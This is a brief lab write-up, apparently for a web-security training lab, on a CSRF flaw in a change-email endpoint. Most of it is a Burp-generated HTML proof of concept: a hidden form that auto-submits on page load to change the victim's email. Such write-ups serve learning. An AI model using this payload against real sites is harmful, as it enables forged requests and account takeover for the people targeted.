## CSRF vulnerability with no defenses
- POST request to /my-account/change-email does not have any CSRF protections. 
- We utilize Burp Suite to generate a CSRF PoC to use on our exploit server to solve the lab. 
```
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="https://0a5500bb03f12bbb808b087b0084007c.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="fake&#64;test&#46;com" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
```
